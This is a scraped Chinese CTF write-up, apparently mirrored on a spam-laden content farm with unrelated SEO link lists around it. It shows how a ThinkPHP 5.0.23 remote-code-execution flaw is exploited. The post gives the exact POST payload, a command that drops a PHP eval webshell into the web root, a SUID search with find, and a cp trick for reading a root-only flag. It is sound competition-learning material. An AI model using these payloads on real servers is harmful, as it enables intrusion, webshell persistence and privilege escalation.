当前位置: 首页 > news >正文

杭州网站外包网站统计分析工具

杭州网站外包,网站统计分析工具,点击图片是网站怎么做,河北互联网公司前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难 Final 考点: ThinkPHP 5.0.23 RCE一句话木马上传SUID提权(find) 解题: 首先页面就给了ThinkPHP V5, 那无非考…

 前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难

Final

考点:

ThinkPHP 5.0.23 RCE+一句话木马上传+SUID提权(find)

 解题:

首先页面就给了ThinkPHP V5, 那无非考的就是ThinkPHP版本的漏洞 ,经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解:

https://blog.csdn.net/Lucky1youzi/article/details/128740552

我们按照他说的做,首先抓包进行传参

GET:index.php?s=captcha
POST:_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 这个参数1 是可以进行修改的,竟然能出现phpinfo页面 ,那我们就可以进行RCE,但是我们发现命令执行参数全被ban了,可能是权限的问题 ,我们上传一句话木马

_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo%20'<?php%20eval($_POST['cmd']);?>'%20>%20/var/www/public/1.php

然后蚁剑连接后发现根目录下存在flag文件

但是里面内容没有 ,一眼没权限,我们去终端看看

我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读

尝试chmod无果

然后我们这里就查看具有SUID权限的命令:

find / -user root -perm -4000 -print 2>/dev/null

这个利用find进行提权可以访问

https://blog.csdn.net/rlenew/article/details/111873682

 

我们使用cp命令SUID提权读取Flag:

cp /flag_dd3f6380aa0d /dev/stdout

 / dev / stdout是—个特殊的文件,代表标准输出。

http://www.zhongyajixie.com/news/41585.html

相关文章:

  • 哪个网站做漂流瓶任务360网址大全
  • 一家装修的网站怎么做推广公司主要做什么
  • wordpress 推送到群搜索引擎优化哪些方面
  • 基于推荐算法的网站开发福州百度开户多少钱
  • 个人怎么样做网站中国最新疫情最新消息
  • wordpress怎么编辑表格博客可以做seo吗
  • 四川省城乡建设部网站首页营销推广的平台
  • 濮阳网红百度推广和优化有什么区别
  • 网站宣传的方式今日军事新闻头条打仗
  • 个人兼职做建设网站线上销售怎么做
  • b站怎么在视频下投放广告百度网站提交了多久收录
  • 才艺多网站建设平台企业网站模板设计
  • 网站做301将重定向到新域名搜狗收录
  • php做的购物网站图片外链在线生成
  • 苏州 网站的公司外贸软件排行榜
  • 深圳品牌设计公司排行信息如何优化上百度首页
  • 推荐网站建设服务杭州关键词优化服务
  • 网上商城开发网站建设推广app最快的方法
  • 30天网站建设 视频教程seo整合营销
  • 篮球网站建设目标郑州网络优化实力乐云seo
  • 违规网站开发 开发者如何规避风险seo和点击付费的区别
  • 手机端java开发工具长春seo网站优化
  • 做网站站长一年能赚多少钱整站优化seo公司哪家好
  • 泗水做网站ys178seo完整教程视频教程
  • 校园网络拓扑图及网络方案seo免费浏览网站
  • 新疆建设监理公司网站站长之家官网入口
  • 福州专业网站制作设计外贸企业网站制作哪家好
  • jsp做网站用什么封装字符串网络营销策划书范文
  • 兴仁市建设局网站恩施seo整站优化哪家好
  • 做网站用什么服务器天津网络优化推广公司